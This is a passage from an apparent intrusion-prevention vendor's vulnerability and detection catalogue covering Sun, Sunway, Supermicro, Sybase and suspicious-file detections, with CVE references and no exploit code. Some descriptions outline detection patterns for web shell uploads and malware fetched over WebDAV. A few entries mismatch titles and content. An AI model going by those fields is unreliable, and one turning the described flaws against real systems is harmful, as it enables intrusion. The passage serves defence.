Description: There exists a design weakness vulnerability in the way Sun Java Web Start ActiveX control handles user supplied data.
Situation: HTTP_SS-Sun-Microsystems-JRE-Isinstalled.dnsresolve-Function-Memory-Exception
File-Text_Sun-Microsystems-JRE-Isinstalled.dnsresolve-Function-Memory-Exception
References:
BID-25734
http://www.securityfocus.com/bid/25734
Back to top

Sun-Mysql-Database-Select-Subquery-Denial-Of-Service

About this vulnerability: A vulnerability in Sun Microsystems MySQL
Risk: High
First detected in: sgpkg-ips-375-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MySQL
Type: Input Validation
Description: A denial of service vulnerability has been reported in MySQL database server. The vulnerability is due to an input validation error while parsing a specially crafted SELECT query with a sub-query in the WHERE clause. Remote authenticated users can exploit this vulnerability to cause a denial of service condition. Successful exploitation would cause the database service to terminate abnormally.
Situation: MySQL_Sun-Mysql-Database-Select-Subquery-Denial-Of-Service
Back to top

Sun-One-Iplanet-Chunked-Enconding-BOF

About this vulnerability: Buffer overflow in Sun ONE / iPlanet Web Server
Risk: High
First detected in: sgpkg-ips-14-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Sun ONE Web Server; iPlanet
Type: Buffer Overflow
Description: Sun ONE Web server (formerly iPlanet Web Server) is vulnerable to a buffer overflow in the function that handles chunked transfer encoding. By sending a specially-crafted GET request that uses chunked transfer encoding to a vulnerable Web server a remote attacker could overflow a buffer and cause the Web server to crash or execute code on the server.
Situation: HTTP_CS-Sun-One-Iplanet-Chunked-Encoding-BOF
References:
CVE-2002-0845
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0845
BID-5433
http://www.securityfocus.com/bid/5433
OSVDB-5070
http://www.osvdb.org/5070
Back to top

Sun-One-Iplanet-Search-Component-File-Disclosure

About this vulnerability: File disclosure vulnerability in Sun One and iPlanet HTTP servers
Risk: Moderate
First detected in: sgpkg-ips-17-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Sun ONE Web Server; iPlanet
Type: Malfunction
Description: Sun iPlanet and One HTTP servers contain a flaw that allows a remote attacker to access arbitrary files outside of the web path. The issue is due to the "search" script not properly sanitizing user input. A remote attacker could create a specially crafted HTTP request with traversal style attack (../../) supplied via the "NS-query-pat" variable.
Situation: HTTP_CSU-Sun-One-Iplanet-Search-Component-File-Disclosure
References:
CVE-2002-1042
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1042
BID-5191
http://www.securityfocus.com/bid/5191
OSVDB-846
http://www.osvdb.org/846
Back to top

Sun-Solaris-DHCP-Client-Arbitrary-Code-Execution

About this vulnerability: A vulnerability in Sun Solaris
Risk: High
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Solaris
Software: <os>
Type: Code Injection
Description: There is a command execution vulnerability in the DHCP client application shipped with Solaris. The vulnerability is caused by improper sanitization of data supplied in DHCP reply messages. A remote attacker with access to the target's local network can exploit the vulnerability by sending malicious DHCP replies to the target. Exploiting this flaw allows an attacker to execute arbitrary commands within the privileges of the root user.
Situation: Generic_UDP-Sun-Solaris-DHCP-Client-Arbitrary-Code-Execution
BOOTP_CS-Sun-Solaris-DHCP-Client-Arbitrary-Code-Execution
References:
CVE-2005-2870
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2870
BID-14687
http://www.securityfocus.com/bid/14687
Back to top

Sun-Solaris-Lpd-Remote-Command-Execution

About this vulnerability: Arbitrary command execution vulnerability in Sun Solaris LPD
Risk: Moderate
First detected in: sgpkg-ips-122-2032
Last changed: sgpkg-ips-1296-5242
Platform: Solaris
Software: <os>
Type: Malfunction
Description: Certain versions of Sun Solaris LPD suffer from a command execution vulnerability. The vulnerability allows remote attackers to execute arbitrary commands on vulnerable systems with the print protocol daemon LPD running.
Situation: Printer_CS-Sun-Solaris-Lpd-Remote-Command-Execution
References:
CVE-2001-1583
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1583
BID-3274
http://www.securityfocus.com/bid/3274
OSVDB-15131
http://www.osvdb.org/15131
Back to top

Sun-Solaris-Rwhod-Buffer-Overflow

About this vulnerability: A vulnerability in Sun Solaris
Risk: High
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-1296-5242
Platform: Solaris
Software: <os>
Type: Buffer Overflow
Description: A vulnerability exists within the in.rwhod daemon component of Sun Solaris. The daemon can potentially be exploited from a remote host to be compromised for code injection and execution. This vulnerability may allow an attacker to execute arbitrary code on the vulnerable host within the security context of the root user.
Situation: Generic_UDP-Sun-Solaris-Rwhod-Buffer-Overflow
References:
CVE-2004-1351
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1351
BID-11840
http://www.securityfocus.com/bid/11840
Back to top

Sun-Solaris-sadmind-RPC-Request-Buffer-Overflow

About this vulnerability: A vulnerability in Sun Microsystems Solaris
Risk: Moderate
First detected in: sgpkg-ips-389-4219
Last changed: sgpkg-ips-1296-5242
Platform: Solaris
Software: <os>
Type: Buffer Overflow
Description: A heap-based buffer overflow vulnerability exists in the sadmind service within the Sun Solaris operating system. The vulnerability is due to an input validation error when allocating a heap buffer while parsing specially crafted RPC requests. A remote unauthenticated attacker can leverage this vulnerability by sending a crafted RPC message to the target host, to potentially inject and execute arbitrary code with root level privileges. In a sophisticated attack case where code injection and execution is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the affected service, normally root. In case if the code execution is not achieved, the sadmind service will be terminated abnormally.
Situation: Generic_UDP-Sun-Solaris-sadmind-RPC-Request-Buffer-Overflow
SunRPC_CS-Sun-Solaris-sadmind-RPC-Request-Buffer-Overflow
References:
CVE-2008-3869
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3869
BID-35083
http://www.securityfocus.com/bid/35083
OSVDB-54663
http://www.osvdb.org/54663
Back to top

Sun-Solaris-sadmind-RPC-Request-Integer-Overflow

About this vulnerability: Sun Solaris sadmind RPC Request Integer Overflow
Risk: High
First detected in: sgpkg-ips-224-3038
Last changed: sgpkg-ips-1296-5242
Platform: Solaris 8; Solaris 9
Software: RPC
Type: Buffer Overflow
Description: An integer overflow vulnerability exists in the sadmind service within the Sun Solaris operating system. The vulnerability resides in the calculation of a buffer allocation size while parsing specially crafted RPC requests. A remote unauthenticated attacker can leverage this vulnerability by sending a crafted RPC message to the target host, to potentially inject and execute arbitrary code with root level privileges. In a sophisticated attack case where code injection and execution is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the affected service, normally root. In case if the code execution is not achieved, the sadmind service will be terminated abnormally. Varous XDR implementations (SunRPC, libnsl, libc, glibc, etc..) are vulnerable to a buffer overflow condition, which can be exploited by an attacker to cause denial of service or to execute arbitrary commands on the system.
Situation: Generic_RPC-sadmind-RPC-Request-Integer-Overflow
References:
CVE-2008-3870
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3870
BID-35083
http://www.securityfocus.com/bid/35083
OSVDB-54668
http://www.osvdb.org/54668
Back to top

Sun-Solaris-sadmind-RPC-Request-Integer-Overflow-CVE-2008-3870

About this vulnerability: A vulnerability in Sun Microsystems Solaris
Risk: Moderate
First detected in: sgpkg-ips-384-4219
Last changed: sgpkg-ips-1296-5242
Platform: Solaris
Software: RPC
Type: Integer Overflow
Description: An integer overflow vulnerability exists in the sadmind service within the Sun Solaris operating system. The vulnerability resides in the calculation of a buffer allocation size while parsing specially crafted RPC requests. A remote unauthenticated attacker can leverage this vulnerability by sending a crafted RPC message to the target host, to potentially inject and execute arbitrary code with root level privileges. In a sophisticated attack case where code injection and execution is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the affected service, normally root. In case if the code execution is not achieved, the sadmind service will be terminated abnormally.
Situation: Generic_UDP-Sun-Solaris-sadmind-RPC-Request-Integer-Overflow-CVE-2008-3870
References:
CVE-2008-3870
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3870
BID-35083
http://www.securityfocus.com/bid/35083
OSVDB-54668
http://www.osvdb.org/54668
Back to top

Sundown-Malware

About this vulnerability: Sundown malware
Risk: High
First detected in: sgpkg-ips-793-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Sundown is an exploit kit.
Situation: HTTP_CSU-Sundown-Malware-Activity
HTTP_SHS-Sundown-Malware-Activity
Back to top

Sunhillo-Sureline-Command-Injection-CVE-2021-36380

About this vulnerability: A vulnerability in Sunhillo SureLine
Risk: High
First detected in: sgpkg-ips-1641-5242
Last changed: sgpkg-ips-1641-5242
Platform: Generic
Software: SureLine
Type: Input Validation
Description: An unauthenticated command injection vulnerability has been reported in Sunhillo SureLine versions before 8.7.0.1.1.
Situation: HTTP_CRL-Sunhillo-Sureline-Command-Injection-CVE-2021-36380
References:
CVE-2021-36380
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36380
Back to top

SunRPC-Xdr-Xdrmem-Getbytes-Integer-Overflow

About this vulnerability: Buffer overflow in various XDR implementations
Risk: Critical
First detected in: sgpkg-ips-478-5211
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: <os>
Type: Buffer Overflow
Description: Varous XDR implementations, for example SunRPC, libnsl, libc, and glibc, are vulnerable to a buffer overflow condition, which can be exploited by an attacker to cause denial of service or to execute arbitrary commands on the system.
Situation: Generic_UDP-SunRPC-Xdr-Xdrmem-Getbytes-Integer-Overflow
References:
CVE-2003-0028
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0028
BID-7123
http://www.securityfocus.com/bid/7123
Back to top

Sunway-ForceControl-Denial-Of-Service-Vulnerability

About this vulnerability: A vulnerability in Sunway ForceControl
Risk: Moderate
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Sunway ForceControl
Type: Buffer Overflow
Description: There is a vulnerability in Sunway ForceControl which may allow an attacker to reboot the system by sending crafted tcp packets.
Situation: Generic_CS-Sunway-ForceControl-Denial-Of-Service-Vulnerability
References:
OSVDB-75800
http://www.osvdb.org/75800
Back to top

Sunway-ForceControl-SCADA-Login-Method-ActiveX-Buffer-Overflow-Vulnerability

About this vulnerability: A vulnerability in Sunway Forcecontrol
Risk: Moderate
First detected in: sgpkg-ips-568-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Sunway ForceControl
Type: Buffer Overflow
Description: There is a vulnerability in CellCtrl caused due to a boundary error in the "Login()" method of the Read & Write Excel ActiveX control (RWXls.RWXlsCtrl.2).
Situation: File-Text_Sunway-ForceControl-SCADA-Login-Method-ActiveX-Buffer-Overflow-Vulnerability
References:
BID-49747
http://www.securityfocus.com/bid/49747
OSVDB-75683
http://www.osvdb.org/75683
Back to top

Sunway-ForceControl-SNMP-Netdbserver-Integer-Signedness-Buffer-Overflow

About this vulnerability: A vulnerability in Sunway ForceControl
Risk: Moderate
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Sunway ForceControl
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability has been reported in Sunway ForceControl. The vulnerability is due to an integer signedness error. A remote attacker can exploit this vulnerability by sending a crafted request to the target service. A successful attack would result in the injection and execution of arbitrary attacker code. If the attack fails, the service may terminate abnormally.
Situation: Generic_CS-Sunway-ForceControl-Netdbserver-Integer-Signedness-Buffer-Overflow
Back to top

Sunway-ForceControl-SNMP-Netdbserver-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Sunway ForceControl
Risk: Moderate
First detected in: sgpkg-ips-416-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Sunway ForceControl
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability has been reported in Sunway ForceControl. The vulnerability is due to a lack of bounds checking. A remote attacker can exploit this vulnerability by sending a crafted request to the target service. A successful attack would result in the injection and execution of arbitrary attacker code. If the attack fails, the service may terminate abnormally.
Situation: Generic_CS-Sunway-ForceControl-SNMP-Netdbserver-Stack-Buffer-Overflow
Back to top

Superfish-TLS-Certificate

About this vulnerability: TLS Certificate referencing Superfish
Risk: Moderate
First detected in: sgpkg-ips-630-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Superfish is a cloud based image analyzing software which installs a 3rd party root certificate to the running computer. As the program also contains the private key generating valid certificates, an attacker may use it to generate system accepted forged signatures for man in the middle attacks or forced system updates.
Situation: HTTPS_SS-Superfish-TLS-Certificate
Back to top

Supermicro-IPMI-Static-SSL-Certificate

About this vulnerability: A Supermicro IPMI Static SSL Certificate vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-765-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Supermicro Onboard IPMI
Type: Insecure Configuration
Description: A vulnerability in Supermicro Onboard IPMI, firmware version SMT_X9_214, which allows remote attackers to perform a man-in-the-middle attack, and to decrypt all communication to the controller.
Situation: TLS_SS-Supermicro-IPMI-Static-SSL-Certificate
References:
CVE-2013-3619
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3619
Back to top

Supermicro-Onboard-IPMI-Close-Window-Cgi-Buffer-Overflow

About this vulnerability: Supermicro Onboard IPMI close window cgi Buffer Overflow
Risk: Moderate
First detected in: sgpkg-ips-574-5211
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: Supermicro Onboard IPMI
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Supermicro Onboard IPMI allowing remote attackers to execute arbitrary code.
Situation: HTTP_CRL-Supermicro-Onboard-IPMI-Close-Window-Cgi-Buffer-Overflow
References:
CVE-2013-3623
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3623
OSVDB-99598
http://www.osvdb.org/99598
Back to top

Supermicro-Onboard-IPMI-login.cgi-Multiple-Buffer-Overflows

About this vulnerability: A vulnerability in Supermicro Onboard IPMI
Risk: High
First detected in: sgpkg-ips-597-5211
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: Supermicro Onboard IPMI
Type: Buffer Overflow
Description: There are two buffer overflow vulnerabilities in Supermicro Onboard IPMI. The vulnerabilities are due to missing length checks when reading the values of name and pwd parameters.
Situation: HTTP_CRL-Supermicro-Onboard-IPMI-login.cgi-Multiple-Buffer-Overflows
References:
CVE-2013-3621
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3621
Back to top

Supermicro-Onboard-IPMI-logout.cgi-Buffer-Overflow

About this vulnerability: A vulnerability in Supermicro Onboard IPMI
Risk: High
First detected in: sgpkg-ips-597-5211
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: Supermicro Onboard IPMI
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Supermicro Onboard IPMI. The vulnerability are due to a missing length check when reading the value of SID parameter passed to logout.cgi.
Situation: HTTP_CRL-Supermicro-Onboard-IPMI-logout.cgi-Buffer-Overflow
References:
CVE-2013-3622
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3622
Back to top

Supermicro-Onboard-IPMI-url_redirect.cgi-Directory-Traversal

About this vulnerability: A vulnerability in Supermicro Onboard IPMI
Risk: High
First detected in: sgpkg-ips-597-5211
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: Supermicro Onboard IPMI
Type: Buffer Overflow
Description: There is a directory traversal vulnerability in Supermicro Onboard IPMI. The vulnerability is due to lack of sanitization of the url_name parameter passed to url_redirect.cgi.
Situation: HTTP_CRL-Supermicro-Onboard-IPMI-url_redirect.cgi-Directory-Traversal
Back to top

Supervene-RazDC-Create-User-Code-Injection

About this vulnerability: A vulnerability in Supervene RazDC
Risk: High
First detected in: sgpkg-ips-1323-5242
Last changed: sgpkg-ips-1323-5242
Platform: Generic
Software: Supervene RazDC
Type: Input Validation
Description: There exists a vulnerability in Supervene RazDC which allows remote attackers to execute arbitrary code due to the lack of input validation to the password parameter to create_user.cgi.
Situation: HTTP_CS-Supervene-RazDC-Create-User-Code-Injection
References:
CVE-2018-15551
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15551
Back to top

Supervene-RazDC-Reset-Password-Code-Injection

About this vulnerability: A vulnerability in Supervene RazDC
Risk: High
First detected in: sgpkg-ips-1323-5242
Last changed: sgpkg-ips-1323-5242
Platform: Generic
Software: Supervene RazDC
Type: Input Validation
Description: There exists a vulnerability in Supervene RazDC which allows remote attackers to execute arbitrary code due to the lack of input validation to the password parameter to save_passwd.cgi.
Situation: HTTP_CS-Supervene-RazDC-Reset-Password-Code-Injection
References:
CVE-2018-15549
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15549
Back to top

Supervisor-XML-RPC-Authenticated-Remote-Code-Execution

About this vulnerability: A Supervisor XML-RPC Authenticated Remote Code Execution vulnerability
Risk: High
First detected in: sgpkg-ips-1020-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux; Unix; Mac OS X
Software: Supervisor
Type: Input Validation
Description: A vulnerability in Supervisor XML-RPC, versions 3.0a1 to 3.3.2, which allows remote attackers to execute arbitrary code via a malicious XML-RPC request.
Situation: HTTP_CRL-Supervisor-XML-RPC-Authenticated-Remote-Code-Execution
References:
CVE-2017-11610
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11610
Back to top

Support-Incident-Tracker-Remote-Command-Execution

About this vulnerability: A Support Incident Tracker Remote Command Execution vulnerability
Risk: Moderate
First detected in: sgpkg-ips-789-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Support Incident Tracker
Type: Insecure Configuration
Description: A vulnerability in the Support Incident Tracker, version 3.65, in ftp_upload_file.php, which allows remote attackers to obtain sensitive information via the file name which reveals the installation path in an error message.
Situation: HTTP_CS-Support-Incident-Tracker-Remote-Command-Execution
References:
CVE-2011-3829
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3829
OSVDB-76999
http://www.osvdb.org/76999
Back to top

Supra-Smart-Cloud-TV-Remote-File-Inclusion

About this vulnerability: A vulnerability in Supra Smart Cloud TV
Risk: Low
First detected in: sgpkg-ips-1194-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Supra Smart Cloud TV
Type: Insecure Configuration
Description: A vulnerability in Supra Smart Cloud TV which allows remote attackers to send a crafted request and broadcast a fake video due to the lack of sesion management and authentication.
Situation: HTTP_CSU-Supra-Smart-Cloud-TV-Remote-File-Inclusion
References:
CVE-2019-12477
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12477
Back to top

Suprema-Biostar-2-SQL-Injection-CVE-2023-27167

About this vulnerability: A vulnerability in Suprema BioStar 2
Risk: High
First detected in: sgpkg-ips-1657-5242
Last changed: sgpkg-ips-1657-5242
Platform: Generic
Software: Suprema BioStar 2
Type: Input Validation
Description: An SQL injection vulnerability has been reported in Suprema BioStar 2 version 2.8.16.
Situation: HTTP_CRL-Suprema-Biostar-2-SQL-Injection-CVE-2023-27167
References:
CVE-2023-27167
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27167
Back to top

Suspected_Website_Defacement

About this vulnerability: A suspected website defacement was detected
Risk: Moderate
First detected in: sgpkg-ips-1228-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Backdoor
Description: Suspected website defacement was detected. A website defacement is an attack against a website to change the visual content on it. The content on the website can also be malicious.
Situation: File-Text_Suspected_Website_Defacement
Back to top

Suspicious-ASPX-File-Upload

About this vulnerability: A suspicious ASPX file upload
Risk: High
First detected in: sgpkg-ips-1755-5242
Last changed: sgpkg-ips-1755-5242
Platform: Any Operating System
Software: Any Software
Type: Code Injection
Description: ASPX file upload with suspicious contents was detected. This can indicate an attempt to place a web shell on the server.
Situation: File-Text_Suspicious-ASPX-File-Content-Upload
File-TextId_Suspicious-ASPX-File-Content-Upload
Back to top

Suspicious-Decimal-Content

About this vulnerability: Suspicious decimal content was detected
Risk: High
First detected in: sgpkg-ips-1361-5242
Last changed: sgpkg-ips-1361-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Suspicious decimal content was detected.
Situation: File-Text_Suspicious-Decimal-Content
Back to top

Suspicious-ELF-File-Download

About this vulnerability: An attempt to download a suspicious ELF file detected
Risk: High
First detected in: sgpkg-ips-1413-5242
Last changed: sgpkg-ips-1413-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: An attempt to download a suspicious ELF file detected.
Situation: File-Exe_Suspicious-ELF-File-Download
Back to top

Suspicious-Executable-Download

About this vulnerability: Suspicious executable download detected
Risk: High
First detected in: sgpkg-ips-1202-5242
Last changed: sgpkg-ips-1405-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Suspicious download of an executable file from Wordpress platform was detected. Malicious actors (ex. Emotet) have been confirmed to use hacked Wordpress sites to delivery their malicious programs.
Situation: File-Exe_Suspicious-Executable-Download
Back to top

Suspicious-Executable-Filename

About this vulnerability: An executable with suspicious name detected
Risk: Low
First detected in: sgpkg-ips-805-5242
Last changed: sgpkg-ips-1860-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: A suspiciously named executable file.
Situation: File-Name_Suspicious-Executable-Filename
Back to top

Suspicious-Filename

About this vulnerability: An information disclosure vulnerability
Risk: High
First detected in: sgpkg-ips-350-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Generic FTP server
Type: Insecure Configuration
Description: An insecure configuration may expose server to an information disclosure exploits.
Situation: FTP_CS-Suspicious-Filename
Back to top

Suspicious-IPP-Request-CVE-2024-47176

About this vulnerability: An attempt to exploit a vulnerability in cups-browsed detected
Risk: High
First detected in: sgpkg-ips-1786-5242
Last changed: sgpkg-ips-1791-5242
Platform: Generic
Software: cups-browsed
Type: Input Validation
Description: CUPS is a standards-based, open-source printing system, and the cups-browsed service contains network printing functionality including auto-discovering print services and shared printers. The service binds to "INADDR_ANY:631", causing it to trust any packet from any source. As a result, multiple bugs in "cups-browsed" can be exploited in sequence to introduce a malicious printer to the system, including CVE-2024-47076, CVE-2024-47175, and CVE-2024-47177.
Situation: Generic_UDP-Suspicious-IPP-Request-CVE-2024-47176
File-Binary_CUPS-Remote-Command-Execution-Via-FoomaticRIPCommandLine-CVE-2024-47177
File-Binary_CUPS-Command-Injection-CVE-2024-47176
References:
CVE-2024-47176
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47176
Back to top

Suspicious-Jsp-File-Upload

About this vulnerability: A suspicious JSP file upload
Risk: High
First detected in: sgpkg-ips-1527-5242
Last changed: sgpkg-ips-1667-5242
Platform: Any Operating System
Software: Any Software
Type: Code Injection
Description: An upload of a JSP file with path traversal characters in the file name or URL parameters was detected. This can indicate an attempt to place a web shell on the server.
Situation: File-Text_Suspicious-Jsp-File-Upload
File-Text_Suspicious-Jsp-File-Content-Upload
File-TextId_Suspicious-Jsp-File-Upload
Back to top

Suspicious-MSDT-URI-Scheme-In-HTML

About this vulnerability: A suspicious MSDT URI Scheme in HTML
Risk: High
First detected in: sgpkg-ips-1472-5242
Last changed: sgpkg-ips-1495-5242
Platform: Windows
Software: Microsoft Office
Type: Malfunction
Description: A remote code execution vulnerability CVE-2022-30190 has been reported in Microsoft Office. This situation detects suspicious HTML files that contain a MSDT URI scheme associated with this vulnerability.
Situation: File-Text_Suspicious-MSDT-URI-Scheme-In-HTML
References:
CVE-2022-30190
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30190
Back to top

Suspicious-Multiline-HTTP-Header

About this vulnerability: Multi-line HTTP server header
Risk: Low
First detected in: sgpkg-ips-783-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Insecure Configuration
Description: Suspicious multiline entries detected in HTTP server header field. Often this means odd server configuration, but sometimes it can be used to evade http packet inspection.
Situation: HTTP_SHS-Suspicious-Multiline-HTTP-Header
Back to top

Suspicious-Server-Name-Indication

About this vulnerability: Suspicious looking Server Name Indication field
Risk: Low
First detected in: sgpkg-ips-779-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Browser
Description: A suspicious pattern in TLS handshake Server Name Indication -extension. (E.g. www.62vikz6k4gjkk2hzjytan2x3.com) This is often related to spoofed TLS server names in tunneling protocols such as Tor.
Situation: TLS-SNI_Suspicious-Server-Name-Indication
Back to top

Suspicious-SettingContent-MS-File

About this vulnerability: A suspicious settingcontent-ms file detected
Risk: Moderate
First detected in: sgpkg-ips-1089-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There has been reported a an issue with safe file formats which can be abused to achieve remote code execution on Windows operation system.
Situation: File-TextId_Suspicious-SettingContent-MS-File
References:
CVE-2018-8414
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8414
ms18-aug
http://technet.microsoft.com/security/bulletin/ms18-aug
Back to top

Suspicious-User-Agent-WinHTTP-Loader

About this vulnerability: Suspicious user-agent WinHTTP loader was detected
Risk: High
First detected in: sgpkg-ips-1202-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Suspicious user-agent string WinHTTP loader was detected. This user-agent has been used by malware (ex. Trickbot). In some cases, this situation might cause false-positives.
Situation: HTTP_CSH-Suspicious-User-Agent-WinHTTP-Loader
Back to top

Suspicious-WebDav-Request-To-Known-TCP-Tunneling-Services

About this vulnerability: A suspicious WebDAV request detected
Risk: High
First detected in: sgpkg-ips-1832-5242
Last changed: sgpkg-ips-1832-5242
Platform: Windows
Software: Any Software
Type: Backdoor
Description: This fingerprint detects WebDAV requests to public TCP tunneling services, such as trycloudflare.com. Such activities are usually performed by malware to stealthily access exploit files hosted on legitimate services.
Situation: HTTP_CSH-Suspicious-WebDav-Request-To-Known-TCP-Tunneling-Services
Back to top

Suspicious-Windows-Script-Retrieval-Via-WebDav

About this vulnerability: A suspicious Windows script file retrieval detected
Risk: High
First detected in: sgpkg-ips-1832-5242
Last changed: sgpkg-ips-1832-5242
Platform: Windows
Software: Any Software
Type: Backdoor
Description: This fingerprint detects the retrieval of Windows script files over WebDAV. Such activities are usually performed by malware to stealthily access exploit files hosted on legitimate services.
Situation: HTTP_CSU-Suspicious-Windows-Script-File-Retrieval-Via-WebDav
Back to top

Suspiciously-Large-Windows-Script-File

About this vulnerability: A transfer of a suspiciously large Windows script file detected
Risk: High
First detected in: sgpkg-ips-1863-5242
Last changed: sgpkg-ips-1863-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: A common strategy to distribute malware onto victims' computers is to embed the malware executable inside a VBScript or Batch script, which extracts and drops the executable when being executed. These dropper scripts are usually larger than usual (e.g., few megabytes).
Situation: File-Text_Suspiciously-Large-Windows-Script-File
File-Binary_Suspiciously-Large-Windows-Script-File
Back to top

SVN-Subversion-Apr-Time-T-System-Compromise

About this vulnerability: Buffer overflow in Subversion's apr_time_t data conversion
Risk: High
First detected in: sgpkg-ips-15-1210
Last changed: sgpkg-ips-1761-5242
Platform: Generic
Software: Subversion
Type: Buffer Overflow
Description: Subversion suffers from a buffer overflow vulnerability in a function that converts date strings. Remote attackers can exploit the vulnerability by sending a crafted DAV2 REPORT query or a get-dated-rev request, which causes a stack-based buffer overflow and allows arbitrary code execution.
Situation: HTTP_CS-Subversion-Apr-Time-T-System-Compromise
SVN_Subversion-Apr-Time-T-System-Compromise
References:
CVE-2004-0397
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0397
BID-10386
http://www.securityfocus.com/bid/10386
OSVDB-6301
http://www.osvdb.org/6301
Back to top

SVN_Subversion-String-Parsing

About this vulnerability: A vulnerability in Subversion
Risk: High
First detected in: sgpkg-ips-420-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Subversion
Type: Buffer Overflow
Description: There is a vulnerability in the way Subversion handles svn protocol requests. A specially crafted svn request could cause svnserve, the daemon that handles svn protocol requests, to allocate insufficient heap memory and overflow the heap. It is possible for a malicious attacker to run arbitrary code on the Subversion server with the privilege of the account that runs svnserve daemon.
Situation: SVN_Subversion-String-Parsing
References:
CVE-2004-0413
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0413
BID-10519
http://www.securityfocus.com/bid/10519
Back to top

Sybase-EAServer-Directory-Traversal

About this vulnerability: A Sybase EAServer Directory Traversal vulnerability.
Risk: High
First detected in: sgpkg-ips-715-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Sybase Enterprise Application Server
Type: Directory Traversal
Description: A vulnerability in Sybase EAServer 6.3.1 Developer Edition which allows remote attackers to read arbitrary files via a directory traversal.
Situation: HTTP_CSU-Apache-Backslash-Directory-Traversal
References:
CVE-2011-2474
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2474
OSVDB-72498
http://www.osvdb.org/72498
Back to top

Sybase-M-Business-Anywhere-agSoap.exe-BOF

About this vulnerability: A vulnerability in Apple Computer Common UNIX Printing System (CUPS)
Risk: Moderate
First detected in: sgpkg-ips-391-4219
Last changed: sgpkg-ips-1588-5242
Platform: Windows
Software: Sybase M-Business Anywhere
Type: Malfunction
Description: A heap buffer overflow vulnerability exists in Sybase M-Business Anywhere. The vulnerability is due to a boundary error while agSoap.exe processes closing tags for XML entities in a SOAP request.
Situation: HTTP_CS-Sybase-M-Business-Anywhere-agSoap.exe-BOF
References:
BID-47775
http://www.securityfocus.com/bid/47775
Back to top

Sybase-Open-Server-Function-Pointer-Array-Code-Execution

About this vulnerability: A vulnerability in Sybase OpenServer
Risk: High
First detected in: sgpkg-ips-408-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Sybase Open Server
Type: Malfunction
